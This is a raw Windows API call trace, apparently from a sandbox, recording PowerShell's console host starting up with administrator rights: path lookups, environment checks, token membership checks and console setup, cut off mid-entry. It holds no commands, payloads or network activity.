lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16db50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0089.134] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16db50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0089.136] CoTaskMemAlloc (cb=0x104) returned 0x2e4450 [0089.136] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4450, nSize=0x80 | out: lpBuffer="") returned 0x0 [0089.136] CoTaskMemFree (pv=0x2e4450) [0089.140] CoTaskMemAlloc (cb=0x104) returned 0x2e4450 [0089.140] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4450, nSize=0x80 | out: lpBuffer="") returned 0x0 [0089.140] CoTaskMemFree (pv=0x2e4450) [0089.140] CoTaskMemAlloc (cb=0x104) returned 0x2e4450 [0089.141] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4450, nSize=0x80 | out: lpBuffer="") returned 0x0 [0089.141] CoTaskMemFree (pv=0x2e4450) [0089.144] CoCreateGuid (in: pguid=0x16e168 | out: pguid=0x16e168*(Data1=0xe09239f, Data2=0xe13a, Data3=0x44e5, Data4=([0]=0xa7, [1]=0xda, [2]=0xa4, [3]=0xa6, [4]=0x6, [5]=0x40, [6]=0x5b, [7]=0x75))) returned 0x0 [0089.149] CoTaskMemAlloc (cb=0x104) returned 0x2e4450 [0089.149] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4450, nSize=0x80 | out: lpBuffer="") returned 0x0 [0089.149] CoTaskMemFree (pv=0x2e4450) [0089.152] CoTaskMemAlloc (cb=0x104) returned 0x2e4450 [0089.152] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4450, nSize=0x80 | out: lpBuffer="") returned 0x0 [0089.153] CoTaskMemFree (pv=0x2e4450) [0089.156] CoTaskMemAlloc (cb=0x104) returned 0x2e4450 [0089.156] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4450, nSize=0x80 | out: lpBuffer="") returned 0x0 [0089.156] CoTaskMemFree (pv=0x2e4450) [0089.165] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf [0089.168] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x16de10 | out: lpConsoleScreenBufferInfo=0x16de10) returned 1 [0089.176] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13 [0089.176] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x16de10 | out: lpConsoleScreenBufferInfo=0x16de10) returned 1 [0089.177] GetVersionExW (in: lpVersionInformation=0x16dda0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x16dda0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.181] GetCurrentProcess () returned 0xffffffffffffffff [0089.182] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x16de38 | out: TokenHandle=0x16de38*=0x32c) returned 1 [0089.187] GetTokenInformation (in: TokenHandle=0x32c, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x16dd58 | out: TokenInformation=0x0, ReturnLength=0x16dd58) returned 0 [0089.188] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x25a7e0 [0089.188] GetTokenInformation (in: TokenHandle=0x32c, TokenInformationClass=0x8, TokenInformation=0x25a7e0, TokenInformationLength=0x4, ReturnLength=0x16dd58 | out: TokenInformation=0x25a7e0, ReturnLength=0x16dd58) returned 1 [0089.190] DuplicateTokenEx (in: hExistingToken=0x32c, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x16deb8 | out: phNewToken=0x16deb8*=0x328) returned 1 [0089.190] GetTokenInformation (in: TokenHandle=0x32c, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x16dd58 | out: TokenInformation=0x0, ReturnLength=0x16dd58) returned 0 [0089.190] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x25a810 [0089.190] GetTokenInformation (in: TokenHandle=0x32c, TokenInformationClass=0x8, TokenInformation=0x25a810, TokenInformationLength=0x4, ReturnLength=0x16dd58 | out: TokenInformation=0x25a810, ReturnLength=0x16dd58) returned 1 [0089.192] CheckTokenMembership (in: TokenHandle=0x328, SidToCheck=0x2e615c8*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x16dec8 | out: IsMember=0x16dec8) returned 1 [0089.192] CloseHandle (hObject=0x328) returned 1 [0089.192] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0089.192] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d870, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0089.193] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d870, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0089.193] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d870, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0089.249] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0089.249] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d870, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0089.249] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d870, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0089.254] CoTaskMemAlloc (cb=0x804) returned 0x1b830080 [0089.254] GetConsoleTitleW (in: lpConsoleTitle=0x1b830080, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39 [0089.254] CoTaskMemFree (pv=0x1b830080) [0089.290] CoTaskMemAlloc (cb=0x804) returned 0x1b830930 [0089.290] GetConsoleTitleW (in: lpConsoleTitle=0x1b830930, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39 [0089.290] CoTaskMemFree (pv=0x1b830930) [0089.291] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0089.291] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0089.291] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0089.293] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1 [0089.298] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0089.299] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0089.299] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0089.299] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0089.361] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0089.361] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0089.361] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0089.361] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0089.362] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0089.362] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0089.367] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d9e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0089.367] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0089.367] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0089.367] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0089.494] SetConsoleCtrlHandler (HandlerRoutine=0x2a368dc, Add=1) returned 1 [0089.507] GetStdHandle (nStdHandle=0xfffffff6) returned 0x108 [0089.512] GetConsoleCP () returned 0x1b5 [0089.520] GetFileType (hFile=0x108) returned 0x3 [0089.535] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x334 [0089.537] CoCreateGuid (in: pguid=0x16dfb0 | out: pguid=0x16dfb0*(Data1=0x16a7f845, Data2=0xd28, Data3=0x4e38, Data4=([0]=0xa6, [1]=0x11, [2]=0xf9, [3]=0x4a, [4]=0xa7, [5]=0x61, [6]=0x5c, [7]=0x76))) returned 0x0 [0089.539] CoTaskMemAlloc (cb=0x104) returned 0x2e4450 [0089.539] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4450, nSize=0x80 | out: lpBuffer="") returned 0x0 [0089.539] CoTaskMemFree (pv=0x2e4450) [0089.601] WinSqmIsOptedIn () returned 0x0 [0089.602] CoTaskMemAlloc (cb=0x104) returned 0x2e4450 [0089.602] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4450, nSize=0x80 | out: lpBuffer="") returned 0x0 [0089.602] CoTaskMemFree (pv=0x2e4450) [0089.607] CoTaskMemAlloc (cb=0x104) returned 0x2e4450 [0089.607] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4450, nSize=0x80 | out: lpBuffer="") returned 0x0 [0089.607] CoTaskMemFree (pv=0x2e4450) [0089.608] CoTaskMemAlloc (cb=0x104) returned 0x2e4450 [0089.608] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4450, nSize=0x80 | out: lpBuffer="") returned 0x0 [0089.608] CoTaskMemFree (pv=0x2e4450) [0089.610] CoTaskMemAlloc (cb=0x104) returned 0x2e4450 [0089.610] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4450, nSize=0x80 | out: lpBuffer="") returned 0x0 [0089.610] CoTaskMemFree (pv=0x2e4450) [0089.612] CoTaskMemAlloc (cb=0x104) returned 0x2e4450 [0089.612] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4450, nSize=0x80 | out: lpBuffer="") returned 0x0 [0089.612] CoTaskMemFree (pv=0x2e4450) [0089.627] CoTaskMemAlloc (cb=0x104) returned 0x2e4450 [0089.627] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4450, nSize=0x80 | out: lpBuffer="") returned 0x0 [0089.627] CoTaskMemFree (pv=0x2e4450) [0089.629] CoTaskMemAlloc (cb=0x104) returned 0x2e4450 [0089.629] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4450, nSize=0x80 | out: lpBuffer="") returned 0x0 [0089.629] CoTaskMemFree (pv=0x2e4450) [0089.630] CoTaskMemAlloc (cb=0x104) returned 0x2e4450 [0089.630] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4450, nSize=0x80 | out: lpBuffer="") returned 0x0 [0089.630] CoTaskMemFree (pv=0x2e4450) [0089.637] CoTaskMemAlloc (cb=0x104) returned 0x2e4450 [0089.638] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4450, nSize=0x80 | out: lpBuffer="") returned 0x0 [0089.638] CoTaskMemFree (pv=0x2e4450) [0089.643] CoTaskMemAlloc (cb=0x104) returned 0x2e4450 [0089.643] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4450, nSize=0x80 | out: lpBuffer="") returned 0x0 [0089.643] CoTaskMemFree (pv=0x2e4450) [0089.644] CoTaskMemAlloc (cb=0x104) returned 0x2e4450 [0089.644] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4450, nSize=0x80 | out: lpBuffer="") returned 0x0 [0089.644] CoTaskMemFree (pv=0x2e4450) [0089.645] CoTaskMemAlloc (cb=0x104) returned 0x2e4450 [0089.645] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4450, nSize=0x80 | out: lpBuffer="") returned 0x0 [0089.645] CoTaskMemFree (pv=0x2e4450) [0089.848] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d400, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.849] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d350, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.849] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d350, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.849] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d350, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.959] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d400, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.959] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d350, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.959] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d350, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.960] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d400, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.960] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d350, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.960] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d350, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.961] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d400, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.961] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d350, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.961] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d350, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.962] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d400, lpFilePart=0x0 | out: 